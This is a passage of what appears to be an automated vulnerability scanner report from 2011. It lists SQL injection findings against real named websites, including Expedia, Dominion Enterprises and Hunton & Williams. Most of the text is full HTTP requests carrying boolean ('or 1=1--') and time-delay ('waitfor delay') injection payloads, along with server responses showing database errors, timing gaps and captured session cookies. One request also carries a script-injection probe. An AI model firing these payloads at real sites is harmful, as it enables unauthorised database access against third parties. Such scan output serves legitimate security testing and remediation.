The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 48717636'%20or%201%3d1--%20 and 48717636'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /main/do/businesses48717636'%20or%201%3d1--%20/id/13/category/For%20Businesses HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://www.dominionenterprises.com/main/do/For_Businesses
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; PHPSESSID=6fd5a07363603c0a3f4685bb1fb4e9b2; TSa27990=d77c9a2ab2f3f328d9ee79ee1dcd6b0b3a05433071c0aed34dc4432a9c5eca8583c4cdbd; WT_FPC=id=227919100c685f30f311304725152629:lv=1304725177227:ss=1304725152629; s_nr=1304725179971; s_lv=1304725179971; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:38:52 GMT
X-Powered-By: PHP/4.4.2
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:38:52 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Type: text/html
Content-Length: 32718

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Home</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="description" content="Home">
   <meta name="keywords" content="Home">
   <meta name="copyright" content="Dominion Enterprises">
   <meta name="resource-type" content="document">
   <meta name="distribution" content="global">
   <meta name="author" content="">
   <meta name="robots" content="index, follow">
   <meta name="revisit-after" content="1 days">
   <meta name="rating" content="general">

<script language="javascript" type="text/javascript">
var IsIPad = false;
function QueryStringIsRequestFromMobile(DirectToFullSite) {
Queries = window.location.search.substring(1);
if (Queries == "" || Queries == null) {
return false;
}
else {
QueryArray = Queries.split("&");
for (i = 0; i < QueryArray.length; i++) {
QueryValue = QueryArray[i].split("=");
if (QueryValue[0] == DirectToFullSite) {
if (QueryValue[1] == "fs24lmj09")
return true;
else
return false;
}
else
return false;
}
}
}
function IsMobileRedirection() {
var agent = navigator.userAgent.toLowerCase();
var IsMobile = false;
if ((agent.indexOf('absinthe') != -1) ||
(agent.indexOf('albacore') !
...[SNIP]...

Request 2

GET /main/do/businesses48717636'%20or%201%3d2--%20/id/13/category/For%20Businesses HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://www.dominionenterprises.com/main/do/For_Businesses
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; PHPSESSID=6fd5a07363603c0a3f4685bb1fb4e9b2; TSa27990=d77c9a2ab2f3f328d9ee79ee1dcd6b0b3a05433071c0aed34dc4432a9c5eca8583c4cdbd; WT_FPC=id=227919100c685f30f311304725152629:lv=1304725177227:ss=1304725152629; s_nr=1304725179971; s_lv=1304725179971; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:38:52 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:38:52 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Length: 0
Content-Type: text/html


2.37. http://www.expedia.com/daily/common/moreinfo.asp [trl parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /daily/common/moreinfo.asp

Issue detail

The trl parameter appears to be vulnerable to SQL injection attacks. The payload 89842498'%20or%201%3d1--%20 was submitted in the trl parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /daily/common/moreinfo.asp HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
Cache-Control: max-age=0
Origin: http://www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; jscript=1; s1=`user=v.8,0,EX01D44B82B4$F4$B5201000I$27$E96!G0.!5010$2302!50$5C$E9$88i$97$D0$2D$37!4$FF!e02000`95; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`104; srvys=v.1%2C2%2C0
Content-Length: 1023

BundleType=1&WT=Home&bFfstAB=&bFfstDefault=&bFfst=&FCity=Austin%2C+TX+%28AUS-Austin-Bergstrom+International+Airport%29&FTLA=AUS&TCity=Detroit%2C+MI+%28DTW-Wayne+County%29&TTLA=DTW&TCityId=&FDate=mm%2F
...[SNIP]...
rigName=&LsFlightDestTLA=&LsFlightDestName=&LsHotel=&LsAtlas=&LsAtlasRegionId=&LsFOverride=&LsTOverride=&taIndex=&taText=&taType=&taOn=1&srch=flt&typ=1&flx=on&fct=AUS&tct=DTW&mon=4-2011&trl=0%2C1%2C1089842498'%20or%201%3d1--%20&rad1=1&rse1=0&rch1=0

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 23:21:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: s1=`user=v.8,0,EX011D32290D$F4$B5202000$AE$28$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$CC$DD$EE$F5$E8$8C$9E$94$82$AB$89$FB!e02000`137; Domain=.expedia.com; path=/
Set-Cookie: p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`gacct=v.1,1,215819541`188; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 77907

<!-- srvpush1 16:21:24(:715) -->
<style type="text/css">

.intchk {width: 100%; font-size: 16px; font-weight: bold; color:#C60;}
.intchk ul{list-style-type: none; padding: 0; margin-left: 1em;}
.
...[SNIP]...
<COMMENT ID=ERROR_TEXT TITLE="[MR43]: 37000 (200110): [Microsoft][ODBC SQL Server Driver][SQL Server]SP: FareCacheFareGetDepartureDateR. Parameter is invalid. Parameter: NightStayNbrMax; value: 0.">
...[SNIP]...

2.38. http://www.expedia.com/pub/agent.dll [rged parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The rged parameter appears to be vulnerable to SQL injection attacks. The payload 61613067%20or%201%3d1--%20 was submitted in the rged parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /pub/agent.dll?qscr=flex&subm=1&city=AUS&citd=DTW&date1=&mnth=5/1/2011&rgst=1&rged=1061613067%20or%201%3d1--%20&fxst=0&load=1&cAdu=1&rfrr=-429 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; jscript=1; s1=`user=v.8,0,EX01D44B82B4$F4$B5201000I$27$E96!G0.!5010$2302!50$5C$E9$88i$97$D0$2D$37!4$FF!e02000`95; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`104; srvys=v.1%2C2%2C0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:39:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: s1=`user=v.8,0,EX01CA76DEA0$F4$B5202000A$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$C1$25$EEzK$21l$5F$82$AB$89$FB!e02000`129; Domain=.expedia.com; path=/
Set-Cookie: p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`gacct=v.1,1,215819499`188; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 76383

<!-- srvpush1 15:39:25(:293) -->
<style type="text/css">

.intchk {width: 100%; font-size: 16px; font-weight: bold; color:#C60;}
.intchk ul{list-style-type: none; padding: 0; margin-left: 1em;}
.
...[SNIP]...
<COMMENT ID=ERROR_TEXT TITLE="[MR43]: 37000 (8114): [Microsoft][ODBC SQL Server Driver][SQL Server]Error converting data type numeric to tinyint.">
...[SNIP]...

2.39. http://www.expedia.com/pub/agent.dll [rgst parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The rgst parameter appears to be vulnerable to SQL injection attacks. The payload 12520755%20or%201%3d1--%20 was submitted in the rgst parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /pub/agent.dll?qscr=flex&subm=1&city=AUS&citd=DTW&date1=&mnth=5/1/2011&rgst=112520755%20or%201%3d1--%20&rged=10&fxst=0&load=1&cAdu=1&rfrr=-429 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; jscript=1; s1=`user=v.8,0,EX01D44B82B4$F4$B5201000I$27$E96!G0.!5010$2302!50$5C$E9$88i$97$D0$2D$37!4$FF!e02000`95; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`104; srvys=v.1%2C2%2C0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:39:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: s1=`user=v.8,0,EX01CA76DEA0$F4$B5202000A$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$C1$25$EEzK$21l$5F$82$AB$89$FB!e02000`129; Domain=.expedia.com; path=/
Set-Cookie: p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`gacct=v.1,1,215819499`188; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 77852

<!-- srvpush1 15:39:01(:987) -->
<style type="text/css">

.intchk {width: 100%; font-size: 16px; font-weight: bold; color:#C60;}
.intchk ul{list-style-type: none; padding: 0; margin-left: 1em;}
.
...[SNIP]...
<COMMENT ID=ERROR_TEXT TITLE="[MR32]: 37000 (8114): [Microsoft][ODBC SQL Server Driver][SQL Server]Error converting data type int to tinyint.">
...[SNIP]...

2.40. http://www.expedia.com/pubspec/scripts/eap.asp [TripLength parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /pubspec/scripts/eap.asp

Issue detail

The TripLength parameter appears to be vulnerable to SQL injection attacks. The payload 11976288'%20or%201%3d1--%20 was submitted in the TripLength parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /pubspec/scripts/eap.asp?GOTO=FLEXFLTSEARCH&Load=1&FrAirport=AUS&ToAirport=DTW&Month=5/1/2011&TripLength=0,1,1011976288'%20or%201%3d1--%20&NumAdult=1&rfrr=-429 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; jscript=1; s1=`user=v.8,0,EX01D44B82B4$F4$B5201000I$27$E96!G0.!5010$2302!50$5C$E9$88i$97$D0$2D$37!4$FF!e02000`95; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`104; srvys=v.1%2C2%2C0

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:38:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: s1=`user=v.8,0,EX01EA6AFBE3$F4$B5202000$5E$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$1B$81$B1$2Bb$A0$C7K$82$AB$89$FB!e02000`133; Domain=.expedia.com; path=/
Set-Cookie: p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`gacct=v.1,1,215819499`188; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 77907

<!-- srvpush1 15:38:49(:042) -->
<style type="text/css">

.intchk {width: 100%; font-size: 16px; font-weight: bold; color:#C60;}
.intchk ul{list-style-type: none; padding: 0; margin-left: 1em;}
.
...[SNIP]...
<COMMENT ID=ERROR_TEXT TITLE="[MR09]: 37000 (200110): [Microsoft][ODBC SQL Server Driver][SQL Server]SP: FareCacheFareGetDepartureDateR. Parameter is invalid. Parameter: NightStayNbrMax; value: 0.">
...[SNIP]...

2.41. http://www.hunton.com/FCWSite/Img/ntpagetag/ntpagetag.gif [CurrentZone cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /FCWSite/Img/ntpagetag/ntpagetag.gif

Issue detail

The CurrentZone cookie appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the CurrentZone cookie. The application took 52577 milliseconds to respond to the request, compared with 13344 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /FCWSite/Img/ntpagetag/ntpagetag.gif?js=1&ts=1304742445101.846&lc=http%3A%2F%2Fwww.hunton.com%2Fprofessionals%2FuniGC.aspx%3FxpST%3DProfessionalSearch&rf=http%3A%2F%2Fwww.hunton.com%2Faboutus%2FuniGC.aspx%3FxpST%3DAboutUs&rs=1920x1200&cd=16&ln=en&tz=GMT%20-05%3A00&jv=1&h1content=Webpage&h1lang=English%20(United%20States)&h1pagetitle=Professionals%20%7C%20Hunton%20%26%20Williams%20LLP&h1subcontent=None HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/professionals/uniGC.aspx?xpST=ProfessionalSearch
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw')waitfor%20delay'0%3a0%3a20'--; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.4.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1846; PortletId=5983402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7

Response

HTTP/1.1 404 Not Found
Date: Sat, 07 May 2011 01:31:45 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=0; path=/
Set-Cookie: PortletId=0; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: ZoneId=0; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 888


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
<head><title>
   404
</title></head>
<body MS_POSITIONING="FlowLayout">
   
<form name="Form1" method="post" acti
...[SNIP]...

2.42. http://www.hunton.com/FCWSite/Img/ntpagetag/ntpagetag.gif [js parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /FCWSite/Img/ntpagetag/ntpagetag.gif

Issue detail

The js parameter appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the js parameter. The application took 36962 milliseconds to respond to the request, compared with 170 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /FCWSite/Img/ntpagetag/ntpagetag.gif?js=1',0)waitfor%20delay'0%3a0%3a20'--&ts=1304742418094.778&lc=http%3A%2F%2Fwww.hunton.com%2Fnews%2FuniGC.aspx%3FxpST%3DPENSearch&rf=http%3A%2F%2Fwww.hunton.com%2F&rs=1920x1200&cd=16&ln=en&tz=GMT%20-05%3A00&jv=1&h1content=Webpage&h1lang=English%20(United%20States)&h1pagetitle=News%20%26%20Events%20%7C%20Hunton%20%26%20Williams%20LLP&h1subcontent=None&h1websection=news HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/news/uniGC.aspx?xpST=PENSearch
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.1.10.1304742363; sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; DefaultCulture=en-US; Mode=1; EventingStatus=1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; NavId=1857; PortletId=5994402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7

Response

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 23:51:21 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=0; path=/
Set-Cookie: PortletId=0; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: ZoneId=0; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 890


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
<head><title>
   404
</title></head>
<body MS_POSITIONING="FlowLayout">
   
<form name="Form1" method="post" acti
...[SNIP]...

2.43. http://www.hunton.com/FCWSite/Img/ntpagetag/ntpagetag.gif [jv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /FCWSite/Img/ntpagetag/ntpagetag.gif

Issue detail

The jv parameter appears to be vulnerable to SQL injection attacks. The payload ,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the jv parameter. The application took 29078 milliseconds to respond to the request, compared with 349 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /FCWSite/Img/ntpagetag/ntpagetag.gif?js=1&ts=1304742738624.440&lc=http%3A%2F%2Fwww.hunton.com%2Fnews%2FuniGC.aspx%3FxpST%3DPENSearch%26nsextt%3D%2527%253E%253Cscript%253Enetsparker(9)%253C%2Fscript%253E&rs=1920x1200&cd=16&ln=en&tz=GMT%20-05%3A00&jv=1,0)waitfor%20delay'0%3a0%3a20'--&h1content=Webpage&h1lang=English%20(United%20States)&h1pagetitle=News%20%26%20Events%20%7C%20Hunton%20%26%20Williams%20LLP&h1subcontent=None&h1websection=news HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/news/uniGC.aspx?xpST=PENSearch&nsextt=%27%3E%3Cscript%3Enetsparker(9)%3C/script%3E
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.9.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1849; PortletId=5986402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7

Response

HTTP/1.1 404 Not Found
Date: Sat, 07 May 2011 00:53:50 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
